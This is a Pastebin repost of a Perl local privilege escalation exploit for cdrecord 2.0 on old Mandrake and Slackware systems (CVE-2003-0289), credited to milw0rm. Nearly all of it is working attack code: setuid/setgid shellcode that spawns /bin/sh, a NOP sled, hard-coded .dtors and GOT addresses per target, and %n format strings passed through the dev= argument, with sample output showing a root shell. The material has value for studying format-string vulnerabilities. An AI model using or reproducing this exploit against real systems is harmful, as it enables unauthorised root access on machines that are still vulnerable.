Advertisement
FlyFar

CDRTools CDRecord 2.0 (Mandrake / Slackware) - Local Privilege Escalation - CVE-2003-0289

Jan 24th, 2024
1,209
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.02 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. ###########################################################
  3. # Cdrecord version 2.0 and < local root exploit.
  4. #
  5. #
  6. #   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
  7. #   Using target number 4
  8. #   Using Mr .dtors 0x808c82c
  9. #   Cdrecord 2.0 (i586-mandrake-linux-gnu)
  10. #
  11. #   scsibus: -1 target: -1 lun: -1
  12. #   Warning: Open by 'devname' is unintentional and not supported.
  13. #   /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver.
  14. #   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
  15. #   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
  16. #   sh-2.05b# id
  17. #   uid=0(root) gid=0(root) groups=503(wsxz)
  18. #   sh-2.05b#
  19. #####################################################
  20.  
  21.             $shellcode =
  22.                     "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
  23.             "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
  24.             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
  25.                     "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
  26.                     "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
  27.                     "\xff\xff/bin/sh";
  28.  
  29.             $cdrecordpath = "/usr/bin/cdrecord";
  30.             $nop = "\x90"; # x86 NOP
  31.                     $offset = 0; # Default offset to try.
  32.  
  33.  
  34.      if (@ARGV == 1 || @ARGV == 2) {
  35.                     $target = $ARGV[0];
  36.                     $offset = $ARGV[1];
  37.             }else{
  38.             printf(" Priv8security.com Cdrecord local root exploit!!\n");
  39.             printf(" usage: $0 target\n");
  40.             printf(" List of targets:\n");
  41.             printf("      1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n");
  42.                     printf("      2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n");
  43.                     printf("      3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
  44.             printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
  45.             exit(1);
  46.             }
  47.  
  48.      if ( $target eq "1" ) {
  49.                    $retword = 0x0807af38; #Mr  .dtors ;)
  50.            $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
  51.             }
  52.      if ( $target eq "2" ) {
  53.                   # $retword = 0x08084578; #.dtors
  54.                    $retword = 0x08084684; #.GOT exit
  55.            $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
  56.             }
  57.       if ( $target eq "3" ) {
  58.                    $retword = 0x0807f658;
  59.                    $fmtstring =  "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
  60.             }
  61.        if ( $target eq "4" ) {
  62.                    $retword = 0x0808c82c; #.GOT exit
  63.            $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
  64.             }
  65.  
  66.             printf("Using target number %d\n", $target);
  67.                     printf("Using Mr .dtors 0x%x\n",$retword);
  68.  
  69.             $new_retword = pack('l', ($retword));
  70.             $new_retshell = pack('l', ($retshell));
  71.                     $buffer2 = $new_retword;
  72.                     $buffer2 .= $nop x 150;
  73.                     $buffer2 .= $shellcode;
  74.                     $buffer2 .= $fmtstring;
  75.  
  76.             exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");
  77.  
  78.  
  79. # milw0rm.com [2003-05-14]
  80.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement